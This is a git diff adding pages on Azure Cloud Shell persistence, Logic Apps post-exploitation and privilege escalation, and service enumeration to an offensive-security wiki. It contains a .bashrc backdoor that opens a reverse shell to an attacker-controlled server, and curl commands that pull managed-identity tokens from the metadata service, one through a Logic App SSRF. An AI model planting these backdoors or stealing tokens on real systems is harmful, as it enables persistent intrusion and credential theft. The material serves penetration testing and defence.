diff --git a/src/SUMMARY.md b/src/SUMMARY.md index d05776c716..4d0520541a 100644 --- a/src/SUMMARY.md +++ b/src/SUMMARY.md @@ -409,6 +409,7 @@ - [Az - ARM Templates / Deployments](pentesting-cloud/azure-security/az-services/az-arm-templates.md) - [Az - Automation Accounts](pentesting-cloud/azure-security/az-services/az-automation-accounts.md) - [Az - Azure App Services](pentesting-cloud/azure-security/az-services/az-app-services.md) + - [Az - Cloud Shell](pentesting-cloud/azure-security/az-services/az-cloud-shell.md) - [Az - Container Registry](pentesting-cloud/azure-security/az-services/az-container-registry.md) - [Az - Container Registry](pentesting-cloud/azure-security/az-services/az-container-instances.md) - [Az - CosmosDB](pentesting-cloud/azure-security/az-services/az-cosmosDB.md) @@ -452,6 +453,7 @@ - [Az - File Share Post Exploitation](pentesting-cloud/azure-security/az-post-exploitation/az-file-share-post-exploitation.md) - [Az - Function Apps Post Exploitation](pentesting-cloud/azure-security/az-post-exploitation/az-function-apps-post-exploitation.md) - [Az - Key Vault Post Exploitation](pentesting-cloud/azure-security/az-post-exploitation/az-key-vault-post-exploitation.md) + - [Az - Logic Apps Post Exploitation](pentesting-cloud/azure-security/az-post-exploitation/az-logic-apps-post-exploitation.md) - [Az - MySQL](pentesting-cloud/azure-security/az-post-exploitation/az-mysql-post-exploitation.md) - [Az - PostgreSQL](pentesting-cloud/azure-security/az-post-exploitation/az-postgresql-post-exploitation.md) - [Az - Queue Storage Post Exploitation](pentesting-cloud/azure-security/az-post-exploitation/az-queue-post-exploitation.md) 
@@ -471,6 +473,7 @@ - [Az - Dynamic Groups Privesc](pentesting-cloud/azure-security/az-privilege-escalation/az-entraid-privesc/dynamic-groups.md) - [Az - Functions App Privesc](pentesting-cloud/azure-security/az-privilege-escalation/az-functions-app-privesc.md) - [Az - Key Vault Privesc](pentesting-cloud/azure-security/az-privilege-escalation/az-key-vault-privesc.md) + - [Az - Logic Apps Privesc](pentesting-cloud/azure-security/az-privilege-escalation/az-logic-apps-privesc.md) - [Az - MySQL Privesc](pentesting-cloud/azure-security/az-privilege-escalation/az-mysql-privesc.md) - [Az - PostgreSQL Privesc](pentesting-cloud/azure-security/az-privilege-escalation/az-postgresql-privesc.md) - [Az - Queue Storage Privesc](pentesting-cloud/azure-security/az-privilege-escalation/az-queue-privesc.md) @@ -480,6 +483,7 @@ - [Az - SQL Privesc](pentesting-cloud/azure-security/az-privilege-escalation/az-sql-privesc.md) - [Az - Virtual Machines & Network Privesc](pentesting-cloud/azure-security/az-privilege-escalation/az-virtual-machines-and-network-privesc.md) - [Az - Persistence](pentesting-cloud/azure-security/az-persistence/README.md) + - [Az - Cloud Shell Persistence](pentesting-cloud/azure-security/az-persistence/az-cloud-shell-persistence.md) - [Az - Queue Storage Persistence](pentesting-cloud/azure-security/az-persistence/az-queue-persistance.md) - [Az - VMs Persistence](pentesting-cloud/azure-security/az-persistence/az-vms-persistence.md) - [Az - Storage Persistence](pentesting-cloud/azure-security/az-persistence/az-storage-persistence.md) diff --git a/src/pentesting-cloud/azure-security/az-persistence/az-cloud-shell-persistence.md b/src/pentesting-cloud/azure-security/az-persistence/az-cloud-shell-persistence.md new file mode 100644 index 0000000000..7e6749b1d4 --- /dev/null +++ b/src/pentesting-cloud/azure-security/az-persistence/az-cloud-shell-persistence.md 
@@ -0,0 +1,56 @@ +# Az - Cloud Shell Persistence + +{% hint style="success" %} +Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) + +
+ +Support HackTricks + +* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** +* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. + +
+{% endhint %} + +## Cloud Shell Persistence + +Azure Cloud Shell offers command-line access to manage Azure resources with persistent storage and automatic authentication. Attackers can exploit this by placing backdoors in the persistent home directory: + +* **Persistent Storage**: Azure Cloud Shell’s home directory is mounted on an Azure file share and remains intact even after the session ends. +* **Startup Scripts**: Files like .bashrc execute automatically at the start of each session, allowing for persistent execution when the cloud shell starts. + +Example backdoor in .bashrc: + +{% code overflow="wrap" %} +```bash +echo '(nohup /usr/bin/env -i /bin/bash 2>/dev/null -norc -noprofile >& /dev/tcp/$CCSERVER/443 0>&1 &)' >> $HOME/.bashrc +``` +{% endcode %} + +This backdoor can execute commands even 5 minutes after the cloud shell is finished by the user. + +Additionally query Azure’s metadata service for instance details and tokens: +{% code overflow="wrap" %} +```bash +curl -H "Metadata:true" "http://169.254.169.254/metadata/identity/oauth2/token?api-version=2018-02-01&resource=https://management.azure.com/" -s +``` +{% endcode %} + + +{% hint style="success" %} +Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) + +
+ +Support HackTricks + +* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** +* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. + +
+{% endhint %} diff --git a/src/pentesting-cloud/azure-security/az-post-exploitation/az-logic-apps-post-exploitation.md b/src/pentesting-cloud/azure-security/az-post-exploitation/az-logic-apps-post-exploitation.md new file mode 100644 index 0000000000..99c3076ea3 --- /dev/null +++ b/src/pentesting-cloud/azure-security/az-post-exploitation/az-logic-apps-post-exploitation.md @@ -0,0 +1,183 @@ +# Az - Logic Apps Post Exploitation + +{% hint style="success" %} +Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) + +
+ +Support HackTricks + +* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** +* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. + +
+{% endhint %} + +## Logic Apps Database Post Exploitation +For more information about logic apps check: + +{% content-ref url="../az-services/az-logic-apps.md" %} +[az-logic-apps.md](../az-services/az-logic-apps.md) +{% endcontent-ref %} + +### "Microsoft.Logic/workflows/read", "Microsoft.Logic/workflows/write" && "Microsoft.ManagedIdentity/userAssignedIdentities/assign/action" +With these permissions, you can modify Logic App workflows and manage their identities. Specifically, you can assign or remove system-assigned and user-assigned managed identities to workflows, which allows the Logic App to authenticate and access other Azure resources without explicit credentials. + +{% code overflow="wrap" %} +```bash +az logic workflow identity remove/assign \ + --name \ + --resource-group \ + --system-assigned true \ + --user-assigned "/subscriptions//resourceGroups//providers/Microsoft.ManagedIdentity/userAssignedIdentities/" +``` +{% endcode %} + +### "Microsoft.Web/sites/read", "Microsoft.Web/sites/write" +With these permissions, you can create or update Logic Apps hosted on an App Service Plan. This includes modifying settings such as enabling or disabling HTTPS enforcement. + +{% code overflow="wrap" %} +```bash +az logicapp update \ + --resource-group \ + --name \ + --set httpsOnly=false +``` +{% endcode %} + +### "Microsoft.Web/sites/stop/action", "Microsoft.Web/sites/start/action" || "Microsoft.Web/sites/restart/action" +With this permission, you can start/stop/restart a web app, including Logic Apps hosted on an App Service Plan. This action ensures that a previously stopped app is brought online and resumes its functionality. This can disrupt workflows, trigger unintended operations, or cause downtime by starting, stopping, or restarting Logic Apps unexpectedly. 
+ +{% code overflow="wrap" %} +```bash +az webapp start/stop/restart \ + --name \ + --resource-group +``` +{% endcode %} + + +### "Microsoft.Web/sites/config/list/action", "Microsoft.Web/sites/read" && "Microsoft.Web/sites/config/write" + +With this permission, you can configure or modify settings for web apps, including Logic Apps hosted on an App Service Plan. This allows changes to app settings, connection strings, authentication configurations, and more. + +{% code overflow="wrap" %} +```bash +az logicapp config appsettings set \ + --name \ + --resource-group \ + --settings "=" +``` +{% endcode %} + +### "Microsoft.Logic/integrationAccounts/write" +With this permission, you can create, update, or delete Azure Logic Apps integration accounts. This includes managing integration account-level configurations like maps, schemas, partners, agreements, and more. + +{% code overflow="wrap" %} +```bash +az logic integration-account create \ + --resource-group \ + --name \ + --location \ + --sku \ + --state Enabled +``` +{% endcode %} + +### "Microsoft.Resources/subscriptions/resourcegroups/read" && "Microsoft.Logic/integrationAccounts/batchConfigurations/write" + +With this permission, you can create or modify batch configurations within an Azure Logic Apps integration account. Batch configurations define how Logic Apps process and group incoming messages for batch processing. + +{% code overflow="wrap" %} +```bash +az logic integration-account batch-configuration create \ + --resource-group \ + --integration-account-name \ + --name \ + --release-criteria '{ + "messageCount": 100, + "batchSize": 1048576, + }' +``` +{% endcode %} + +### "Microsoft.Resources/subscriptions/resourcegroups/read" && "Microsoft.Logic/integrationAccounts/maps/write" +With this permission, you can create or modify maps within an Azure Logic Apps integration account. 
Maps are used to transform data from one format to another, enabling seamless integration between different systems and applications. + +{% code overflow="wrap" %} +```bash +az logic integration-account map create \ + --resource-group \ + --integration-account-name \ + --name \ + --map-type \ + --content-type application/xml \ + --map-content map-content.xslt +``` +{% endcode %} + +### "Microsoft.Resources/subscriptions/resourcegroups/read" && "Microsoft.Logic/integrationAccounts/partners/write" +With this permission, you can create or modify partners in an Azure Logic Apps integration account. Partners represent entities or systems that participate in business-to-business (B2B) workflows. + +{% code overflow="wrap" %} +```bash +az logic integration-account partner create \ + --resource-group \ + --integration-account-name \ + --name \ + --partner-type \ + --content '{ + "b2b": { + "businessIdentities": [ + { + "qualifier": "ZZ", + "value": "TradingPartner1" + } + ] + } + }' +``` +{% endcode %} + +### "Microsoft.Resources/subscriptions/resourcegroups/read" && "Microsoft.Logic/integrationAccounts/sessions/write" +With this permission, you can create or modify sessions within an Azure Logic Apps integration account. Sessions are used in B2B workflows to group messages and track related transactions over a defined period. 
+ +{% code overflow="wrap" %} +```bash +az logic integration-account session create \ + --resource-group \ + --integration-account-name \ + --name \ + --content '{ + "properties": { + "sessionId": "session123", + "data": { + "key1": "value1", + "key2": "value2" + } + } + }' +``` +{% endcode %} + +### "*/delete" +With this permissions you can delete resources related to Azure Logic Apps + + + +{% hint style="success" %} +Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) + +
+ +Support HackTricks + +* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** +* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. + +
+{% endhint %} diff --git a/src/pentesting-cloud/azure-security/az-privilege-escalation/az-logic-apps-privesc.md b/src/pentesting-cloud/azure-security/az-privilege-escalation/az-logic-apps-privesc.md new file mode 100644 index 0000000000..dcbc7b4465 --- /dev/null +++ b/src/pentesting-cloud/azure-security/az-privilege-escalation/az-logic-apps-privesc.md @@ -0,0 +1,79 @@ +# Az - Logic Apps Privesc + +{% hint style="success" %} +Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) + +
+ +Support HackTricks + +* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** +* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. + +
+{% endhint %} + +## Logic Apps Privesc +For more information about SQL Database check: + +{% content-ref url="../az-services/az-logic-apps.md" %} +[az-logic-apps.md](../az-services/az-logic-apps.md) +{% endcontent-ref %} + +### ("Microsoft.Resources/subscriptions/resourcegroups/read", "Microsoft.Logic/workflows/read", "Microsoft.Logic/workflows/write" && "Microsoft.ManagedIdentity/userAssignedIdentities/assign/action") && ("Microsoft.Logic/workflows/triggers/run/action") + +With this permission, you can create or update, Azure Logic Apps workflows. Workflows define automated processes and integrations between various systems and services. + +{% code overflow="wrap" %} +```bash +az logic workflow create \ + --resource-group \ + --name \ + --definition \ + --location + +az logic workflow update \ + --name my-new-workflow \ + --resource-group logicappgroup \ + --definition +``` +{% endcode %} + +And after changing it, you can run it with: + +```bash +az rest \ + --method post \ + --uri "https://management.azure.com/subscriptions/{subscriptionId}/resourcegroups/{resourceGroupName}/providers/Microsoft.Logic/workflows/{logicAppName}/triggers/{triggerName}/run?api-version=2016-10-01" \ + --body '{}' \ + --headers "Content-Type=application/json" +``` + +### ("Microsoft.Web/sites/read", "Microsoft.Web/sites/basicPublishingCredentialsPolicies/read", "Microsoft.Web/sites/write", "Microsoft.Web/sites/config/list/action") && ("Microsoft.Web/sites/start/action") +With these permissions, you can deploy, Logic App workflows using ZIP file deployments. These permissions enable actions such as reading app details, accessing publishing credentials, writing changes, and listing app configurations. 
Alongside the start permissions you can update and deploy a new Logic App with the content desired + +{% code overflow="wrap" %} +```bash +az logicapp deployment source config-zip \ + --name \ + --resource-group \ + --src +``` +{% endcode %} + +{% hint style="success" %} +Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) + +
+ +Support HackTricks + +* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** +* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. + +
+{% endhint %} diff --git a/src/pentesting-cloud/azure-security/az-services/az-app-services.md b/src/pentesting-cloud/azure-security/az-services/az-app-services.md index db148b13de..4170ba1f84 100644 --- a/src/pentesting-cloud/azure-security/az-services/az-app-services.md +++ b/src/pentesting-cloud/azure-security/az-services/az-app-services.md 
@@ -186,12 +186,56 @@ az webapp hybrid-connections list --name --resource-group {{#tab name="Az Powershell" }} ```bash +Get-Command -Module Az.Websites + # Get App Services and Function Apps Get-AzWebApp # Get only App Services Get-AzWebApp | ?{$_.Kind -notmatch "functionapp"} -``` +# Retrieves details of a specific App Service Environment in the specified resource group. +Get-AzAppServiceEnvironment -ResourceGroupName -Name +# Retrieves the access restriction configuration for a specified Web App. +Get-AzWebAppAccessRestrictionConfig -ResourceGroupName -Name +# Retrieves the SSL certificates for a specified resource group. +Get-AzWebAppCertificate -ResourceGroupName +# Retrieves the continuous deployment URL for a containerized Web App. +Get-AzWebAppContainerContinuousDeploymentUrl -ResourceGroupName -Name +# Retrieves the list of continuous WebJobs for a specified Web App. +Get-AzWebAppWebJob -ResourceGroupName -AppName +# Retrieves the list of triggered WebJobs for a specified Web App. +Get-AzWebAppTriggeredWebJob -ResourceGroupName -AppName + +# Retrieves details of a deleted Web App in the specified resource group. +Get-AzDeletedWebApp -ResourceGroupName -Name +# Retrieves a list of snapshots for a specified Web App. +Get-AzWebAppSnapshot -ResourceGroupName -Name +# Retrieves the history of a specific triggered WebJob for a Web App. +Get-AzWebAppTriggeredWebJobHistory -ResourceGroupName -AppName -Name + +# Retrieves information about deployment slots for a specified Web App. +Get-AzWebAppSlot -ResourceGroupName -Name +# Retrieves the continuous WebJobs for a specific deployment slot of a Web App. +Get-AzWebAppSlotWebJob -ResourceGroupName -AppName -SlotName +# Retrieves the triggered WebJobs for a specific deployment slot of a Web App. +Get-AzWebAppSlotTriggeredWebJob -ResourceGroupName -AppName -SlotName +# Retrieves the history of a specific triggered WebJob for a deployment slot of a Web App. 
+Get-AzWebAppSlotTriggeredWebJobHistory -ResourceGroupName -AppName -SlotName -Name +# Retrieves the continuous WebJobs for a Web App. +Get-AzWebAppContinuousWebJob -ResourceGroupName -AppName +# Retrieves the continuous WebJobs for a specific deployment slot of a Web App. +Get-AzWebAppSlotContinuousWebJob -ResourceGroupName -AppName -SlotName + +# Retrieves the traffic routing rules for a Web App. +Get-AzWebAppTrafficRouting -ResourceGroupName -WebAppName -RuleName + +# Retrieves details of a specific backup for a Web App. +Get-AzWebAppBackup -ResourceGroupName -Name -BackupId +# Retrieves the backup configuration for a Web App. +Get-AzWebAppBackupConfiguration -ResourceGroupName -Name +# Retrieves the list of all backups for a Web App. +Get-AzWebAppBackupList -ResourceGroupName -Name +``` {{#endtab }} {{#tab name="az get all" }} diff --git a/src/pentesting-cloud/azure-security/az-services/az-cloud-shell.md b/src/pentesting-cloud/azure-security/az-services/az-cloud-shell.md new file mode 100644 index 0000000000..a8b4069f55 --- /dev/null +++ b/src/pentesting-cloud/azure-security/az-services/az-cloud-shell.md @@ -0,0 +1,58 @@ +# Az - Cloud Shell + +{% hint style="success" %} +Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) + +
+ +Support HackTricks + +* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** +* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. + +
+{% endhint %} + +## Azure Cloud Shell + +**Azure Cloud Shell** is an interactive, authenticated, browser-accessible terminal designed for managing Azure resources, offering the flexibility to work with either Bash or PowerShell. It runs on a temporary, per-session host that times out after 20 minutes of inactivity, while persisting files in the $HOME location using a 5-GB file share. Cloud Shell can be accessed through multiple points, including the Azure portal, shell.azure.com, Azure CLI and PowerShell documentation, the Azure mobile app, and the Visual Studio Code Azure Account extension. + +There aren't permissions assigned to this service, therefore the aren't privilege escalation techniques. Also there isn't any kind of enumeration. + +### Key Features + +**Environment**:Azure Cloud Shell provides a secure environment by running on Azure Linux, Microsoft’s own Linux distribution designed for cloud infrastructure. All packages included in the Azure Linux repository are internally compiled by Microsoft to guard against supply chain attacks. +**Preinstalled Tools**: Cloud Shell includes a comprehensive set of preinstalled tools such as Azure CLI, Azure PowerShell, Terraform, Docker CLI, Ansible, Git, and text editors like vim, nano, and emacs. These tools are ready to use. To list the installed packeges and modules you can use "Get-Module -ListAvailable", "tdnf list" and "pip3 list". +**$HOME persistence**: When starting Azure Cloud Shell for the first time, you can use it with or without an attached storage account. Choosing not to attach storage creates an ephemeral session where files are deleted when the session ends. To persist files across sessions, mount a storage account, which attaches automatically as **$HOME\clouddrive**, with your **$HOME** directory saved as an **.img** file in Azure File Share. However, files outside $HOME and machine states are not persisted. For securely storing secrets like SSH keys, use Azure Key Vault. 
+**Azure drive (Azure:)**: PowerShell in Azure Cloud Shell includes the Azure drive (Azure:), which allows easy navigation of Azure resources like Compute, Network, and Storage using filesystem-like commands. Switch to the Azure drive with cd Azure: and return to your home directory with cd ~. You can still use Azure PowerShell cmdlets to manage resources from any drive. +**Custom Tool Installation**: Users who configure Cloud Shell with a storage account can install additional tools that do not require root permissions. This feature allows for further customization of the Cloud Shell environment, enabling users to tailor their setup to their specific needs. + +## References + +* [https://learn.microsoft.com/en-us/azure/cloud-shell/overview](https://learn.microsoft.com/en-us/azure/cloud-shell/overview) +* [https://learn.microsoft.com/en-us/azure/cloud-shell/features](https://learn.microsoft.com/en-us/azure/cloud-shell/features) +* [https://learn.microsoft.com/en-us/azure/cloud-shell/using-the-shell-window](https://learn.microsoft.com/en-us/azure/cloud-shell/using-the-shell-window) + + +## Persistence + +{% content-ref url="../az-privilege-escalation/az-cloud-shell-persistence.md" %} +[az-cloud-shell-persistence.md](../az-privilege-escalation/az-cloud-shell-persistence.md) +{% endcontent-ref %} + +{% hint style="success" %} +Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) + +
+ +Support HackTricks + +* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** +* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. + +
+{% endhint %} diff --git a/src/pentesting-cloud/azure-security/az-services/az-cosmosDB.md b/src/pentesting-cloud/azure-security/az-services/az-cosmosDB.md index fdf9235ed1..5374e6bd78 100644 --- a/src/pentesting-cloud/azure-security/az-services/az-cosmosDB.md +++ b/src/pentesting-cloud/azure-security/az-services/az-cosmosDB.md @@ -248,7 +248,6 @@ az cosmosdb mongodb collection list --account-name --database-name az cosmosdb mongodb role definition list --account-name --resource-group # List all user definitions for MongoDB within an Azure Cosmos DB account az cosmosdb mongodb user definition list --account-name --resource-group - ``` {% endcode %} {% endtab %} diff --git a/src/pentesting-cloud/azure-security/az-services/az-function-apps.md b/src/pentesting-cloud/azure-security/az-services/az-function-apps.md index 1c37462efb..f7610ce282 100644 --- a/src/pentesting-cloud/azure-security/az-services/az-function-apps.md +++ b/src/pentesting-cloud/azure-security/az-services/az-function-apps.md @@ -207,6 +207,9 @@ Moreover, **no source code will be stored in the storage** account related to th ## Enumeration +{% tabs %} +{% tab title="az cli" %} +{% code overflow="wrap" %} ```bash # List all the functions az functionapp list 
@@ -252,6 +255,29 @@ curl "https://newfuncttest123.azurewebsites.net/admin/vfs/home/site/wwwroot/func # Get source code az rest --url "https://management.azure.com//resourceGroups//providers/Microsoft.Web/sites//hostruntime/admin/vfs/function_app.py?relativePath=1&api-version=2022-03-01" ``` +{% endcode %} +{% endtab %} + +{% tab title="Az PowerShell" %} +{% code overflow="wrap" %} +```powershell +Get-Command -Module Az.Functions + +# Lists all Function Apps in the current subscription or in a specific resource group. +Get-AzFunctionApp -ResourceGroupName + +# Displays the regions where Azure Function Apps are available for deployment. +Get-AzFunctionAppAvailableLocation + +# Retrieves details about Azure Function App plans in a subscription or resource group. +Get-AzFunctionAppPlan -ResourceGroupName -Name + +# Retrieves the app settings for a specific Azure Function App. +Get-AzFunctionAppSetting -Name -ResourceGroupName +``` +{% endcode %} +{% endtab %} +{% endtabs %} ## Privilege Escalation diff --git a/src/pentesting-cloud/azure-security/az-services/az-logic-apps.md b/src/pentesting-cloud/azure-security/az-services/az-logic-apps.md index 99893093b6..cf1f1a4eb2 100644 --- a/src/pentesting-cloud/azure-security/az-services/az-logic-apps.md +++ b/src/pentesting-cloud/azure-security/az-services/az-logic-apps.md 
@@ -32,41 +32,262 @@ For example, something like this won't return the token: curl -XPOST 'https://prod-44.westus.logic.azure.com:443/workflows/2d8de4be6e974123adf0b98159966644/triggers/manual/paths/invoke?api-version=2016-10-01&sp=%2Ftriggers%2Fmanual%2Frun&sv=1.0&sig=_8_oqqsCXc0u2c7hNjtSZmT0uM4Xi3hktw6Uze0O34s' -d '{"url": "http://169.254.169.254/metadata/identity/oauth2/token?api-version=2018-02-01&resource=https://management.azure.com/"}' -H "Content-type: application/json" -v ``` -### Enumeration +### Hosting options + +There are several hosting options: -{{#tabs }} -{{#tab name="az cli" }} +* **Consumption** + - **Multi-tenant**: provides shared compute resources, operates in the public cloud, and follows a pay-per-operation pricing model. This is ideal for lightweight and cost-effective workloads. +* **Standard** + - **Workflow Service Plan**: dedicated compute resources with VNET integration for networking and charges per workflow service plan instance. It is suitable for more demanding workloads requiring greater control. + - **App Service Environment V3** dedicated compute resources with full isolation and scalability. It also integrates with VNET for networking and uses a pricing model based on App Service instances within the environment. This is ideal for enterprise-scale applications needing high isolation. + - **Hybrid** designed for local processing and multi-cloud support. It allows customer-managed compute resources with local network access and utilizes Kubernetes Event-Driven Autoscaling (KEDA). 
+ +### Enumeration +{% tabs %} +{% tab title="az cli" %} +{% code overflow="wrap" %} ```bash # List -az logic workflow list --resource-group --subscription --output table +az logic workflow list --resource-group # Get info -az logic workflow show --name --resource-group --subscription -# Get Logic App config -az logic workflow definition show --name --resource-group --subscription -# Get service ppal used -az logic workflow identity show --name --resource-group --subscription -``` +az logic workflow show --name --resource-group + +# Get details of a specific Logic App workflow, including its connections and parameters +az rest \ + --method GET \ + --uri "https://management.azure.com/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Logic/workflows/{workflowName}?api-version=2016-10-01&$expand=connections.json,parameters.json" \ + --headers "Content-Type=application/json" + +# Get details about triggers for a specific Logic App +az rest --method GET \ + --uri "https://management.azure.com/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Logic/workflows/{logicAppName}/triggers?api-version=2016-06-01" + +# Get the callback URL for a specific trigger in a Logic App +az rest --method POST \ + --uri "https://management.azure.com/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Logic/workflows/{logicAppName}/triggers/{triggerName}/listCallbackUrl?api-version=2016-06-01" + +# Get the history of a specific trigger in a Logic App +az rest --method GET \ + --uri "https://management.azure.com/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Logic/workflows/{logicAppName}/triggers/{triggerName}/histories?api-version=2016-06-01" + +# List all runs of a specific Logic App workflow +az rest \ + --method GET \ + --uri 
"https://management.azure.com/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Logic/workflows/{workflowName}/runs?api-version=2016-06-01" \ + --headers "Content-Type=application/json" + +# Get all actions within a specific run of a Logic App workflow +az rest \ + --method GET \ + --uri "https://management.azure.com/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Logic/workflows/{workflowName}/runs/{runName}/actions?api-version=2016-06-01" \ + --headers "Content-Type=application/json" + +# List all versions of a specific Logic App workflow +az rest \ + --method GET \ + --uri "https://management.azure.com/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Logic/workflows/{workflowName}/versions?api-version=2016-06-01" \ + --headers "Content-Type=application/json" + +# Get details of a specific version of a Logic App workflow +az rest \ + --method GET \ + --uri "https://management.azure.com/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Logic/workflows/{workflowName}/versions/{versionName}?api-version=2016-06-01" \ + --headers "Content-Type=application/json" + +az rest \ + --method GET \ + --uri "https://examplelogicapp1994.scm.azurewebsites.net/api/functions/admin/download?includeCsproj=true&includeAppSettings=true" \ + --headers "Content-Type=application/json" + +# List all Logic Apps in the specified resource group +az logicapp list --resource-group + +# Show detailed information about a specific Logic App +az logicapp show --name --resource-group -{{#endtab }} +# List all application settings for a specific Logic App +az logicapp config appsettings list --name --resource-group +``` +{% endcode %} +{% endtab %} -{{#tab name="Az PowerSHell" }} +{% tab title="Az PowerShell" %} +{% code overflow="wrap" %} ```bash +Get-Command -Module Az.LogicApp + # List Get-AzLogicApp -ResourceGroupName # Get info Get-AzLogicApp 
